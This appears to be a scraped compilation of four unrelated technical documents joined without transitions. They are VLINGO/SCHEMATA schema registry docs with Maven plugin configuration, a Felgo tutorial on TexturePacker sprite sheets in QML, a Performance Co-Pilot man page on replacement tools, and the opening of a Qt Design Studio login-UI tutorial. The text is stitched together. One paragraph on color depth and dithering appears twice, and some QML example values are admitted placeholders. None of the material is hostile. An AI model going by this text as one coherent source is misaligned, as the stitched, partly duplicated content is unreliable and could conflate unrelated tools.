As the specification above demonstrates, the available types are the primitives boolean, byte, char, double, float, int, long, short, and string (each also usable as an array), the special attributes type, version, and timestamp, and references to other schema types, optionally qualified by category and by a specific semantic version. Any given complex Schema type may be included in the Specification, but doing so may limit to some extent consumption across multiple collaborating technical platforms. We make every effort to ensure cross-platform compatibility, but the chosen serialization type may be a limiting factor.
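To make the DSL concrete, here is what a small Events specification might look like. This is an illustrative sketch only: the schema and attribute names are invented, and it assumes the {category} placeholder is written as the lowercase category name (event).

event ProductDefined {
    type eventType
    version eventVersion
    timestamp occurredOn
    string productId
    string name
    string description
}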
As for complex types, we thus consider their cross-platform compatibility an unknown until it can be confirmed by you and your team. An additional warning is appropriate regarding direct domain model usage of Schema types. These Schema types are not meant to be used as first-class domain model Entities, Aggregates, or Value Objects. The Events category types may be used as Domain Events in the domain model, but if so we strongly suggest keeping the specifications simple (not including complex types). Thus:

- Define your domain model Entities and Value Objects strictly in your domain model code, not using a Schema Specification.
- Determine the positive and negative consequences of defining Domain Events only in the schema registry and using them both in the domain model and for your Published Language. It may or may not work well in your case.
- Schema Specifications are primarily about data and expressing present and past intent, not behavior.
- Consider Schema Specification to be more about local-Context migrations of supported Domain Events and inter-Context collaboration and integration of all other Schema types.

VLINGO/SCHEMATA provides an HTTP API and a web user interface. Both can be used to manage master data, like organizations and units, as well as schema definitions. Typically, you'll use the GUI to edit master data and browse existing schemata, and the API to integrate schema registry interactions with your development tooling and build pipelines. Maven users also have the possibility of using VLINGO/BUILD-PLUGINS to publish and consume schemas.

The UI provides a tree view used to browse the available data and a view for each level in the hierarchy described above: Organizations, Units, Contexts, Schemas and Schema Versions. These are accessible via the menu to the left. We also have Dark Mode (top-right). The following shows the process of defining one Organization containing one Unit with a single Context. Once you've done this, you can go ahead and define your Schemas along with their Schema Versions. When defining a Context, you need to use namespace syntax (e.g. com.example.demo).

To be able to create concrete specifications (in Schema Versions), you'll first need to define the Schema meta data. You can choose between all the categories mentioned in Use Cases. When defining a Schema, use an initial capital (e.g. SomethingDefined). When defining a Schema Version, we suggest to always keep semantic versions in order and without version gaps, so you should only use the three buttons for their respective purpose.

While there are many benefits in keeping your specification sources with your project's source code, the GUI still provides an editor to work with specifications. One example use case for this is if you want to describe a contract or small API surface of an external system outside your control and consume the events it publishes.

After having defined one of every hierarchy element, you can switch over to the Home view. In the Home view, you can browse existing Schema Versions by drilling down the hierarchy. Once you've selected the version you're interested in, you can:

- Review its specification
- Update its specification as long as the Schema Version is still a Draft
- Transition between the four lifecycle states Draft, Published, Deprecated and Removed
- Review source code generated from the specification (click on Code)
- Review and update its description (click on Description, then click on Preview)

When you've made some changes to the description and decide not to save them, you can use Revert to just set it back to its initial state.
After having defined a hierarchy element, you can also redefine it. This works with every hierarchy element other than Schema Version, which mustn't be modified once it is no longer a Draft. If it is a Draft, you can modify it on Home. If not, you can define a new Schema Version.

When publishing a new version of an existing schema, the updated specification is validated against the new semantic version according to the following rules:

- New patch version (e.g. 1.2.5 to 1.2.6): The specification needs to remain unchanged; only meta data can be updated
- New minor version (e.g. 1.2.5 to 1.3.0): Only new fields may be added; there must be no removals, type changes or reordering of fields
- New major version (e.g. 1.2.5 to 2.0.0): No restrictions

If these rules are violated, you'll be presented with a list of additions, removals, reorderings and type changes. The colors correspond to the New Major/Minor/Patch button colors. After changing to a new major version, the changed specification can be defined without problems.

The VLINGO/BUILD-PLUGINS component provides goals to talk to the schema registry as part of the build. To use it, include it in the build section of your project's pom.xml and configure the goals as shown below.

<project ...>
  <build>
    <plugins>
      <plugin>
        <groupId>io.vlingo</groupId>
        <artifactId>vlingo-build-plugins</artifactId>
        <version>1.1.0</version>
        <executions>...</executions>
      </plugin>
    </plugins>
  </build>
  ...
</project>

Schemata within the registry are identified by references consisting of organization, unit, context namespace, schema name, and schema version. A schema reference pointing to the Schema MySchema 1.0.5 in the namespace com.example of the unit RnD within the ACME organisation would look like this: ACME:RnD:com.example:MySchema:1.0.5.

By default, the plugin expects your schema specification .vss files to be in the src/main/vlingo/schemata folder within your project. To publish these to the registry, you need to configure the push-schemata goal with:

- the target registry URL, your organization, and unit
- the schema reference for each schema, and the previous version in case you're updating one

A complete configuration for this goal might look like the example below. For additional details on configuration parameters and defaults, please refer to VLINGO/BUILD-PLUGINS.

<execution>
  <goals>
    <goal>push-schemata</goal>
  </goals>
  <configuration>
    <srcDirectory>${basedir}/src/main/vlingo/schemata</srcDirectory>
    <schemataService>
      <url></url>
      <clientOrganization>Vlingo</clientOrganization>
      <clientUnit>examples</clientUnit>
    </schemataService>
    <schemata>
      <schema>
        <ref>Vlingo:examples:io.vlingo.examples.schemata:SchemaDefined:0.0.1</ref>
        <src>SchemaDefined.vss</src>
        <previousVersion>0.0.0</previousVersion>
      </schema>
      <schema>
        <ref>Vlingo:examples:io.vlingo.examples.schemata:SchemaPublished:0.0.1</ref>
      </schema>
    </schemata>
  </configuration>
</execution>

The pull-schemata goal provides for retrieving sources generated from schemata stored in the registry. Per default, the generated sources will be written to target/generated-sources/vlingo and be included in the project's compile path. The goal needs to be configured with:

- the schemata instance URL, your organization, and unit
- the reference of each schema version to consume

The following example makes the build put a SchemaDefined.java file, generated from the schema version identified by the reference Vlingo:examples:io.vlingo.examples.schemata:SchemaDefined:2.0.1, into target/generated-sources/vlingo.
<execution>
  <id>pullSchemata</id>
  <goals>
    <goal>pull-schemata</goal>
  </goals>
  <configuration>
    <schemataService>
      <url></url>
      <clientOrganization>Vlingo</clientOrganization>
      <clientUnit>examples</clientUnit>
    </schemataService>
    <schemata>
      <schema>
        <ref>Vlingo:examples:io.vlingo.examples.schemata:SchemaDefined:2.0.1</ref>
      </schema>
    </schemata>
  </configuration>
</execution>
https://docs.vlingo.io/vlingo-schemata
Cool graphics are essential to probably every game, but you always have to keep in mind that memory is limited, especially on older devices. In this tutorial you will learn how to use the available memory more efficiently, speed up loading sprites and even drawing them, with the help of TexturePacker.

First, follow this link and download TexturePacker. While downloading, take a look at these 2 short and great videos by Code'n'Web, explaining the very basics of what we are talking about in this tutorial (about 3 minutes each): SpriteSheets - TheMovie - Part 1 and SpriteSheets - TheMovie - Part 2. In short, sprite sheets use memory more efficiently and speed up both loading and drawing your sprites; the sections below explain why in detail.

After you finish installing, run TexturePacker. You can use the free trial version for this guide.

Loading every sprite from a separate file has many disadvantages, especially in memory usage and performance. First of all, using file formats such as png or jpeg can reduce the total size of your game, but it won't affect the memory (RAM) usage while your game is running. The sprites have to be uncompressed into the RAM, where they "become" textures the graphics processor can use. This means that every single pixel of the sprite consumes the same amount of memory (4 bytes per pixel with the standard RGBA8888 image format). E.g. a 512x512 pixel png completely filled with black color has a file size of under 5KB, but will still use 1MB (4 bytes per pixel * width * height) of RAM.

The rectangular shape of the sprite usually doesn't match the particular sizes that the hardware demands, and needs to be changed by the system before it can get passed to the GPU. The worst case would be hardware that can only process square sprites with width and height matching a power of 2 (128x128, 256x256, ...). If we have a 140x140 sprite, it will automatically be altered to match the hardware constraints. Since a square of 128x128 would be too small, it will be packed in a 256x256 square, and all the remaining space is unused, but still consumes memory when loading the sprite into the RAM. So instead of 76 KB (4 bytes per pixel * width * height) for the 140x140 sprite, we will now need 256KB of memory space. That's more than 3 times the original space. This adds up quickly, because lots of sprites will be used in a game. E.g. a 512x512 sprite needs 1MB.

Some might say: "Calm down bro, I got 1GB of RAM in my iPhone 5, I can handle your 200 single sprites, no worries!". But you have to keep in mind that your game should maybe also run on an iPod Touch 4 with only 256MB. Also consider that you can't fill all this memory just with sprites of your application. Other applications will use parts of the RAM for their data at the same time. Here is a list of iOS devices and their RAM (Memory): List of iOS devices. But don't worry, you will learn below how sprite sheets can be created with a power-of-two size by combining several sprites so that less to no extra padding is added.

Also the standard RGBA8888 image format with 4 bytes per pixel can be an unnecessary waste of memory. By default, images are stored with 8 bits per color channel. This is 32 bits (= 4 bytes) for red, green, blue and alpha. With 32 bits you can represent 2^32 = 4,294,967,296 different colors, which you don't always need. Background images can be optimized very well by choosing a different format. They don't need the alpha channel because they are always behind everything else.
The color channels' bit depth can be reduced to e.g. 5 bits for red, 6 bits for green (more for green because the human eye is more accurate with green colors) and 5 bits for blue. Suddenly you need only half of the memory you needed before. Furthermore, dithering randomizes the errors introduced by the reduction of the color depth and makes them less visible. This is all supported by TexturePacker.

Fewer draw calls usually improve the performance. Draw calls are expensive because each draw call needs state changes. The CPU will wait for the GPU to finish its current draw command and set the new states. This disturbs the pipelining in the GPU and causes a lot of idle time in the CPU. Additionally, transferring data, e.g. vertex data, to the graphics device is quite slow. In theory, there is a point where more draw calls with less data each are better. Since we have mostly rectangles with 4 vertices each in a 2D engine and hardly any other data, this point cannot be reached in practice. In a nutshell, sprite sheets help the game and the graphics device work better in parallel because of fewer interruptions.

Because several game objects share the same texture with a sprite sheet, they can be displayed through one draw call. This doesn't work if the rectangles are overlapping, because they must be blended in the correct order. Fortunately, the Qt renderer puts as many non-overlapping items as possible in one draw call. This speeds up the rendering performance a lot, even in crowded scenes.

You probably want to have different texture sizes for different screen resolutions. Creating the three different versions for sd, hd and hd2 of all images is an annoying and tedious task for the artists. Fortunately, TexturePacker makes it easy and fast to export the sprite sheets with different scaling settings. Read the section about Automatic Content Scaling for more information.

We made a quick performance test comparing our new TexturePackerAnimatedSprite component with the native Qt AnimatedSprite component. In this test we added instances of them at random positions on the screen until the frame rate dropped below 30 frames per second. As the results show, the difference between the Qt and our sprite implementation is bigger on slower hardware. Felgo can show about 35% more sprites on high-end devices and 100% more on low-end mobile devices! If the Qt renderer didn't use its own internal sprite sheet, the differences would be even greater.

The Felgo implementation is also better in terms of memory consumption. The test program, compiled by MinGW in release mode, used 145 MB of memory with 8000 of our sprites. It used 185 MB with 8000 Qt sprites. So our sprite implementation needs about 25% less memory.

Internally, Qt automatically creates sprite sheets at runtime out of normal Image components. While this is great if you have few images of small size, the Qt solution has several disadvantages. The Felgo solution solves all of these Qt issues. Thus we recommend using a custom sprite sheet created with TexturePacker over the Image and Sprite solutions of Qt. However, when beginning to prototype a game, using the QML Image element and SpriteSequence or AnimatedSprite is perfectly fine. For the best performance in published games though, switch to the TexturePacker components by Felgo.

You can get TexturePacker from here. TexturePacker is an extremely powerful, easily accessible and well-designed tool.
It supports all required features and can export to arbitrary resolutions, which makes it a great fit to export the sd, hd and hd2 textures based on your high-res versions. The best thing is, it is written with Qt so it is available for all desktop platforms!

The advantage of texture packing tools is that you can automatically put all your images into a single texture. When exporting, you can then change the resolution of the image for the 3 main resolutions sd, hd and hd2 (see the How to create mobile games for different screen sizes and resolutions guide for more information). So you can work with a single version of your graphics in the highest resolution, and scale them down in no time.

TexturePacker generates 2 kinds of files: the texture file (the packed sprite sheet image) and a data file that describes where each sprite sits within the sheet. The data file of the Squaby Demo, for example, looks like this:

{"frames": {
  "10.png": {
    "frame": {"x":2,"y":2,"w":32,"h":26},
    "rotated": false,
    "trimmed": false,
    "spriteSourceSize": {"x":0,"y":0,"w":32,"h":26},
    "sourceSize": {"w":32,"h":26}
  },
  "15.png": {
    "frame": {"x":36,"y":2,"w":32,"h":26},
    "rotated": false,
    "trimmed": false,
    "spriteSourceSize": {"x":0,"y":0,"w":32,"h":26},
    "sourceSize": {"w":32,"h":26}
  },
  ... // the definitions for all the other images follow here, automatically generated by the texture packing tools ...
},
"meta": {
  "app": "",
  "version": "1.0",
  "image": "squaby.png",
  "format": "RGBA8888",
  "size": {"w":128,"h":256},
  "scale": "0.25",
  "smartupdate": "$TexturePacker:SmartUpdate:e5683c69753f891cee5b8fcf8d21cf93$"
}
}

Let's take a look at this great tool and use it to create a little project. We are using some sprites of the Felgo game Squaby for this guide. You can download the resources here: resources.

In the TexturePacker GUI, click Add smart folder, navigate to our Felgo project, and add the texturepacker-resources folder, or simply drag and drop your raw assets folder into the window. Now you can see all the sprites from that folder on the left-hand side. If you change anything within the folder, TexturePacker will automatically pick up all the changes. It's also possible to arrange your sprites in subfolders and refer to them with their relative path later, or even add multiple folders to the same sprite sheet - this can be handy for larger games where you have the same items on multiple sprite sheets/levels.

Below that, in the bottom right corner, is the size of your sprite sheet and the amount of memory it will use in the RAM. In the center you can see how TexturePacker arranges all the sprites in an optimized way, representing your resulting sprite sheet. We will take a closer look at some of the most important options on the right-hand side.

Like I mentioned above, the standard format would be RGBA8888 with 4 bytes per pixel (red, green, blue and alpha for transparency). With this setting our sprite sheet will use 2048KB of memory, as you can see in the bottom right of the TexturePacker GUI. If we change it to RGBA4444, we discard half of the color information, ending up with half the memory used, which is a huge improvement. Go ahead and try it out!

Saving 1MB didn't convince you about this feature's strength? Then we will do the math again with an hd2 texture. 2048 * 2048 * 4 bytes results in 16MB (!) of memory needed in the RAM for just one texture. So with RGBA4444 we can save 8MB (!!!) with each texture. HUUUUGE!

Of course, half the color information can also cause problems, especially with gradients. This is where TexturePacker's killer feature Dithering comes into play.
Of course, half the color depth can also cause problems, especially with gradients. This is where TexturePacker's killer feature, dithering, comes into play. Try out the different dithering options and take a close look at the sprites. While the towers and Squabies still look very good, the digit sprites (5, 10, 15) are so gradient-heavy (especially the shadow) that even with dithering we are not fully satisfied with the outcome. In this case the best approach would probably be to split the sprite sheets into one with the gradient-heavy sprites and one with the others, and choose a different image format for each of them. Whether the memory win is worth the trade-off of having more sprite sheets always depends on the number of sprites you have. In this tutorial we will just stick to RGBA8888 so we can go on - make sure you change the image format back to it.

You simply create your images for the highest resolution and let TexturePacker scale them down for lower resolutions. Regarding this, I highly recommend reading How to create mobile games for different screen sizes and resolutions if you haven't done so already. These will be the different resolutions of your scene on different devices (while the logical size of your scene stays 480x320 to not affect the game logic):

- sd: 480x320
- hd: 960x640
- hd2: 1920x1280

This means the common work-flow would be: create your graphics in the highest resolution (hd2) and let TexturePacker export the scaled-down hd and sd variants automatically. In the scaling variants menu, enter the settings for the three variants and click Apply.

And what's the thought behind saving the same images 3 times in different sizes? Again, saving RAM is the answer. On lower resolution devices you don't need huge hd2 sprites, so Felgo uses the smaller ones instead, to save memory. Felgo DOES support it, so make sure it's activated! If you want to find out more about any of the options, just hover your mouse above them and read the tool-tips.

Just one more thing to add regarding image formats: RGB565 keeps most of the color information but completely discards the alpha channel, which makes it perfect for reducing the size of background images. This is also used internally in Felgo when you use the BackgroundImage component.

Fine, we covered the most important options for our tutorial and are nearly ready to publish our sprite sheet; we are just missing a name for our data file and the texture file. Click the (...) button next to Data File, locate the assets/img folder within your Felgo project and save the file as {v}squaby.json. The "{v}" is a placeholder for the scaling subfolders like "+hd" and "+hd2". The path should now be something like ".../squaby/assets/img/{v}squaby.json". TexturePacker will automatically fill in the Texture File name for you. Now click Publish sprite sheet and all your sprite sheets for the different resolutions are created. You can also save these settings as a *.tps file by clicking Save project.

TexturePackerAnimatedSprite, TexturePackerSpriteSequence and TexturePackerSprite support content scaling like the MultiResolutionImage component. This allows you to create the game only once for a logical scene size and automatically resize the images based on the screen. To use content scaling together with the TexturePacker components, export 3 different versions of your high-res graphics: the high-res hd2 version with a scene resolution of 1920x1280, the hd version with 960x640 and the sd version with 480x320. Just modify the Scale setting in TexturePacker. When your images are made for the hd2 resolution, export them with scale = 1 for the hd2 texture, scale = 0.5 for the hd texture and scale = 0.25 for the sd texture. TexturePacker also creates the corresponding JSON file for each variant.
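Once you have published the variants and copied them into your project (the expected folder layout is shown just below), a throwaway Python script like this one can confirm that the sheet sizes and scale factors came out as intended. This is a sketch assuming the {v}squaby.json naming used in this guide, not part of the Felgo tooling:

# check_variants.py - sanity-check the exported sprite sheet variants
import json
from pathlib import Path

BASE = Path("assets/img")
# The sd files sit next to the other assets; scaled variants go to +hd/+hd2.
VARIANTS = {"sd": BASE, "hd": BASE / "+hd", "hd2": BASE / "+hd2"}

for name, folder in VARIANTS.items():
    meta = json.loads((folder / "squaby.json").read_text())["meta"]
    print("%s: %dx%d px, scale %s, image %s" % (
        name, meta["size"]["w"], meta["size"]["h"], meta["scale"], meta["image"]))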
For the sd export, for example, the Scale is set to 0.25 for both the image and the JSON file. Place the image and JSON files in the correct directories, which - following the {v} placeholder convention from above - look like this:

- assets/img/squaby.json and squaby.png (the sd versions)
- assets/img/+hd/squaby.json and squaby.png
- assets/img/+hd2/squaby.json and squaby.png

If you thought this simple tutorial would finally become super tricky now, I have to disappoint you - more simple stuff is about to come. :) Jump into our main.qml and delete most of it so it looks like this:

import Felgo 3.0
import QtQuick 2.0

GameWindow {
    Scene {
    } // Scene
} // GameWindow

Now we have a GameWindow with an empty Scene where we will place our sprites next. Let's add a single sprite to our Scene:

import Felgo 3.0
import QtQuick 2.0

GameWindow {
    Scene {
        TexturePackerAnimatedSprite {
            id: nailgunSprite
            source: "../assets/img/squaby.json"
            frameNames: ["nailgun.png"]
            x: 100
            y: 100
        } // TexturePackerAnimatedSprite
    } // Scene
} // GameWindow

All we need is the TexturePackerAnimatedSprite component: we set the name of the sprite as TexturePackerAnimatedSprite::frameNames and the path to the JSON file as TexturePackerAnimatedSprite::source. As you can see, the name of the sprite in the sprite sheet is exactly the same as it was as a single sprite. Did you notice the plural of "frameNames" and its usage as a list? Although the TexturePackerAnimatedSprite is mainly meant for sprite animations, it can also be used for static images. It only updates its graphics when necessary and therefore performs well. Keep in mind that the frameNames property is actually a list of strings. Additionally, we added an id and moved the sprite to the defined x/y coordinates. If you run the project, you can see our nail gun sprite. Pretty easy!

Let's modify this sprite at runtime. If you have already played Squaby, you know that the towers can be upgraded. With every upgrade, the nailgun looks different. We will quickly simulate this behavior. Add this after your sprite:

MouseArea {
    anchors.fill: nailgunSprite
    onClicked: {
        if (nailgunSprite.frameNames[0] === "nailgun.png") {
            nailgunSprite.frameNames = ["nailgunUpgradeFire.png"];
        } else if (nailgunSprite.frameNames[0] === "nailgunUpgradeFire.png") {
            nailgunSprite.frameNames = ["nailgunUpgradeBoth.png"];
        } else {
            nailgunSprite.frameNames = ["nailgun.png"];
        }
    }
} // MouseArea

This is why we gave the sprite an id: so we can access its properties. What we are doing here is changing the frameNames of the sprite with each click on it. The sprite automatically gets redrawn when its frameNames change. Run the project and try it out!

This looks too static for your taste? You want some animations? No problem sir, your wish is my command:

import Felgo 3.0
import QtQuick 2.0

GameWindow {
    Scene {
        TexturePackerAnimatedSprite {
            id: squabySprite
            source: "../assets/img/squaby.json"
            frameNames: ["squ1-walk-1.png", "squ1-walk-2.png",
                         "squ1-walk-3.png", "squ1-walk-4.png"]
            interpolate: false
            anchors.centerIn: parent
            frameRate: 3
        }
    }
}

We just added a walking Squaby, quite similar to the static sprite: we added the TexturePackerAnimatedSprite component, set the path to our JSON file as the source, and listed the walk frames in frameNames. Additionally, we added an id and centered the sprite in our scene. If you run the project you can admire that cute little walking Squaby.

But everyone knows these little monsters do not only walk around - they jump and scare the sh** out of us! This time we use a TexturePackerSpriteSequence with multiple TexturePackerSprite children to control several animations at once. Each of these TexturePackerSprite children describes one animation. For example, the "walk" animation below runs at 20 frames per second.
All the sprites used for an animation are set in its frameNames in the correct order. Although I'm already totally frightened of what's about to come, replace our sprite animation with a sprite sequence like this (the walk frames are the ones we used before; the jump frame names are stand-ins, so use the ones from your own sprite sheet):

TexturePackerSpriteSequence {
    id: squabySprite
    source: "../assets/img/squaby.json"
    anchors.centerIn: parent
    TexturePackerSprite {
        name: "walk"
        frameRate: 20
        frameNames: ["squ1-walk-1.png", "squ1-walk-2.png", "squ1-walk-3.png", "squ1-walk-4.png"]
    }
    TexturePackerSprite {
        name: "jump"
        frameRate: 20
        frameNames: ["squ1-jump-1.png", "squ1-jump-2.png"] // stand-in frame names
        to: { "walk": 0.75, "jump": 0.25 }
    }
    MouseArea {
        anchors.fill: squabySprite
        onClicked: {
            squabySprite.jumpTo("jump")
        }
    } // MouseArea
} // TexturePackerSpriteSequence

By clicking you can switch to the "jump" animation. When one cycle of "jump" ends, it has a 75% chance to switch back to the "walk" animation and a 25% chance to play "jump" again. Now we only need to tell the Squaby to stop running and jump instead. This is done in our MouseArea below the sprite animations. If we click the Squaby, we use the TexturePackerSpriteSequence::jumpTo() function to change the animation.

Take a deep breath, fasten your seatbelt and then run your project to try it out! What? That didn't scare you? I guess that means you are pretty damn tough! Compared to you I'm a total wreck right now, so let's stop here with this lesson.

If you have any questions regarding this tutorial, don't hesitate to visit the support forums. Visit Felgo Games Examples and Demos for more information about game creation with Felgo and to see the source code of existing apps in the app stores.
PCPCompat, pcp-collectl, pmwebd — backward-compatibility in the Performance Co-Pilot (PCP)

Introduction

The Performance Co-Pilot (PCP) is a toolkit designed for monitoring and managing system-level performance. These services are distributed and scalable to accommodate the most complex system configurations and performance problems.

In order to achieve these goals effectively, protocol and on-disk compatibility is provided between different versions of PCP. It is feasible (and indeed encouraged) to use current PCP tools to interrogate any remote, down-rev or up-rev pmcd(1) and also to replay any historical PCP archive (the PCP testsuite includes PCP archives created over 20 years ago!).

From time to time the PCP developers deprecate and remove PCP utilities, replacing them with new versions of utilities providing comparable features. This page describes replacement utilities for historical PCP tools.

PCP-Collectl

The pcp-collectl utility has been superseded by pmrep(1) from PCP v5 onward. The equivalent of pcp-collectl subsystem reporting is achieved as follows:

- pmrep :collectl-sc - Processor subsystem view.
- pmrep :collectl-sm - Memory subsystem view.
- pmrep :collectl-sd - Aggregate disks view.
- pmrep :collectl-sD - Per-disk-device view.
- pmrep :collectl-dm-sD - Device mapper view.
- pmrep :collectl-sn - Network subsystem view.

PCP-Webapps

The standalone web applications packaged with older PCP versions have been superseded by grafana-server(1) with the grafana-pcp plugin. This plugin provides an implementation of the Vector application, as well as data sources for pmdabpftrace(1) (bpftrace(8) scripts) and pmseries(1) (fast, scalable Redis-based time series analysis).

Pmwebd

The pmwebd daemon has been superseded by pmproxy(1) from PCP v5 onward. By default, pmproxy will now listen on both its original port (44322) and the PCP web API port (44323) when the time series support is built.

pmproxy provides a compatible implementation of the live PMWEBAPI(3) interfaces used traditionally by the Vector web application (see the "PCP-Webapps" section). It also provides extensions to the original pmwebd REST APIs (such as derived metrics, namespace lookups and instance domain profiles), support for the HTTPS protocol, and fast, scalable time series querying using the pmseries(1) REST API and redis-server(1).

The partial Graphite API emulation provided by pmwebd has not been re-implemented; applications wishing to use similar services could use the scalable time series REST APIs described in PMWEBAPI(3).

See Also

pcp(1), pmcd(1), pmrep(1), pmproxy(1), pmseries(1), pmdabpftrace(1), redis-server(1), grafana-server(1) and PMWEBAPI(3).

Referenced By

The man pages pcp-collectl(1), pcpcompat(1) and pmwebd(1) are aliases of PCPCompat(1).
Log In UI - Part 1

Illustrates how to use wizard templates to create a simple UI that contains a text label, push buttons, and a logo.

Log In UI - Part 1 is the first in a series of tutorials that build on each other to illustrate how to use Qt Design Studio to create a simple UI with some basic UI components, such as pages, buttons, and fields. Part 1 describes how to use the Qt Design Studio wizard templates to create a Qt Quick project and a button UI control, and how to modify the files generated by the wizard templates to design your own UI. The Learn Qt Quick sections provide additional information about the tasks performed by the wizards and about the basics of QML and Qt Quick.

Creating the UI Project

For the purposes of this tutorial, you will use the empty wizard template. Wizard templates are available also for creating UIs that are optimized for mobile platforms and for launcher applications. For more information about the options you have, see Creating Projects.

To create a project:

- Select File > New File or Project > General > Qt Quick Application - Empty > Choose.
- In the Name field, enter the project name: loginui1. When naming your own projects, keep in mind that they cannot be easily renamed later.
- In the Create in field, enter the path to the folder where you want to store the project files. You can move project folders later without problems.
- Select Next (or Continue on macOS) to continue to the Define Project Details page.
- In the Screen resolution field, select the initial size of the UI. In this tutorial, we use the smallest predefined size, 640 x 480. You can easily change the screen size later in Properties.
- Select Finish (or Done on macOS) to create the project.

Your project should now look something like this in the Design mode. The UI is built using a Rectangle QML type that forms the background and a Text type that displays some text.

Note: The visibility of views depends on the selected workspace, so your Qt Design Studio might look somewhat different from the above image. To open hidden views, select View > Views in the Design mode. For more information about moving views around, see Managing Workspaces.

Learn Qt Quick - Projects and Files

Qt Design Studio creates a set of boilerplate files and folders that you need to create a UI using Qt Quick and QML. The files are listed in the Projects view. For more information, see Viewing Project Files.

- The loginui1.qmlproject project file defines that all QML, JavaScript, and image files in the project folder belong to the project. Therefore, you do not need to individually list new files when you add them to the project.
- The loginui1.qml file defines the functionality of the UI. For the time being, it does not do anything.
- The Screen01.ui.qml file defines the appearance of the UI. For more information, see Qt Quick UI Forms.
- The qtquickcontrols2.conf file specifies the selected UI style and some style-specific arguments.
- The imports folder contains a Constants.qml file that specifies a font loader for the Arial font and a qmldir module definition file that declares the Constant QML type. For more information, see Module Definition qmldir Files.

In addition, the QtQuick subfolder contains the Studio components and effects QML types. You can ignore the subfolder for now, because it is not used in this tutorial.

QML files define a hierarchy of objects with a highly-readable, structured layout. Every QML file consists of two parts: an imports section and an object declaration section.
The QML types and functionality most common to UIs are provided in the QtQuick import. You can view the QML code of an ui.qml file in the Text Editor view. For more information about creating a QML file from scratch, see First Steps with QML.

Next, you will edit the values of the properties of the UI elements to create the main page of the UI.

Creating the Main Page

You will now change the values of the properties of the Rectangle component to add a gradient to the UI background, and those of the Text component to set the title text in a larger strong font. In addition, you will import an image as an asset and add it to the page.

To be able to use an image in the UI, you must add it to your project in the Assets tab of Library. Click here to open the Qt logo in a browser and save it as a file on your computer. The image is only used for decoration, so you can also use any other image or just leave it out.

To preview the changes that you make to the UI while you make them, select the (Show Live Preview) button on the Form Editor view toolbar or press Alt+P.

The Screen01.ui.qml file that the wizard template created for you should be open in the Design mode. If it is not, you can double-click it in the Projects view to open it. To modify Screen01.ui.qml in Form Editor:

- Select Rectangle in the Navigator view to display its properties in the Properties view.
- In the Color field, select the (Linear Gradient) button to add a linear gradient to the screen background. Click the start point (1) and end point (2) to specify the gradient colors. Drag and drop the points along the gradient bar to specify where the gradient starts and ends. In this tutorial, the color changes from white to green (#41cd52), starting mid-screen, at position 0.5. You can use your favorite colors or select a predefined gradient in the Gradient Picker. For more information, see Picking Gradients.
- Select Text in Navigator to display its properties in Properties.
- In the id field, enter the id pageTitle, so that you can easily find the title component in Navigator and other Qt Design Studio views.
- In the Text field, enter the page title: Qt Account.
- In the Font group, Size field, set the font size of the title: 24 pixels.
- In the Font style field, select the B button to use a strong font.
- Drag and drop the Qt logo from the Assets tab of Library to the top-left corner of the rectangle. Qt Design Studio automatically creates a component of the Image type for you, with the path to the image file set as the value of the Source field in Properties.
- In the id field, change the id of the image to logo.
- Select File > Save or press Ctrl+S to save your changes.

Your UI should now look something like this in the Design mode and live preview:

Learn Qt Quick - QML Types

The Qt Quick module provides all the basic types necessary for creating UIs. It provides a visual canvas and includes types for creating and animating visual components, receiving user input, and creating data models and views. To be able to use the functionality of Qt Quick types, the wizard template adds the following import statements to the QML files that it creates:

import QtQuick 2.15
import loginui1 1.0

You can view the import statements in the Text Editor view.

The Library view lists the QML types in each Qt module that are supported by Qt Design Studio. You can use the basic types to create your own QML types, and they will be listed under My QML Components. This section is only visible if you have created custom QML components.
The Rectangle, Text, and Image types used in this tutorial are based on the Item type. It is the base type for all visual elements, with implementations of basic functions and properties, such as type name, ID, position, size, and visibility. For more information, see Use Case - Visual Elements In QML. For descriptions of all QML types, see All QML Types in the Qt reference documentation.

Rectangle Properties

The basic Rectangle QML type is used for drawing shapes with four sides and four corners. You can fill rectangles either with a solid fill color or a gradient. You can specify the border color separately. By setting the value of the radius property, you can create shapes with rounded corners. If you want to specify the radius of each corner separately, you can use the Rectangle type from the Qt Quick Studio Components module instead of the basic rectangle type. It is available in the Studio Components tab of Library.

Text Properties

The Text type is used for adding static text to the UI, such as titles and labels. You can select the font to use and specify extensive properties for each text item, such as size in points or pixels, weight, style, and spacing. To display custom fonts in the list of available fonts in Properties, add them in the Assets tab of Library. If you want to create a label with a background, use the Label type from the Qt Quick Controls module instead of the Text type.

Image Properties

The Image type is used for adding images to the UI in several supported formats, including bitmap formats such as PNG and JPEG and vector graphics formats such as SVG. You must add the images to your project in the Assets tab of Library to be able to use them in designs. If you need to display animated images, use the Animated Image type, also available in the Qt Quick - Basic tab of Library.

Creating a Push Button

You can use another wizard template to create a push button and add it to the project. The wizard template creates a reusable button component that appears under My QML Components in Library. You can drag and drop it to Form Editor and modify its properties in Properties to change its appearance and functionality.

If you find that you cannot use the wizard template nor the ready-made button controls available in the Qt Quick Controls 2 tab in Library to create the kind of push button that you want, you can create your button from scratch using basic QML types. For more information, see Creating Buttons and Creating Scalable Buttons and Borders.

To create a push button by using the wizard template:

- Select File > New File or Project > Files and Classes > Qt Quick Controls > Custom Button > Choose.
- In the Component name field, enter a name for your button type: PushButton.
- Select Finish (or Done on macOS) to create the button.

Your button should now look something like this in the Design mode:

Learn Qt Quick - Qt Quick Controls

The Custom Button wizard template creates a Button QML type that belongs to the Qt Quick Controls 2 module. It is a push-button control that can be pushed or clicked by the user. Buttons are normally used to perform an action or to answer a question. The Button type inherits properties and functionality from another QML type. These enable you to set text, display an icon, react to mouse clicks, and so on.
To be able to use the functionality of the Button type, the wizard template adds the following import statements to the PushButton.ui.qml file:

import QtQuick 2.15
import QtQuick.Templates 2.1 as T
import loginui1 1.0

The Qt Quick Templates 2 module provides the functionality of the Button type. The module is imported as T, and the alias is added to the Button type definition to indicate that the Button type from the Qt Quick Controls 2 module is used, instead of some other type with the same name.

T.Button {
    id: control
    width: 100
    height: 40
    font: Constants.font
    implicitWidth: Math.max(
        buttonBackground ? buttonBackground.implicitWidth : 0,
        textItem.implicitWidth + leftPadding + rightPadding)
    ...

    Rectangle {
        id: buttonBackground
        implicitWidth: 100
        implicitHeight: 40
        opacity: enabled ? 1 : 0.3
        border.color: "#41cd52"
        border.width: 1
        anchors.fill: parent
        radius: 20
    }
    ...

Next, you will change the appearance of the button by modifying its properties.

Styling the Button

You can now modify the properties of the PushButton type to your liking. To make the changes apply to all the button instances, you must make them in the PushButton.ui.qml file.

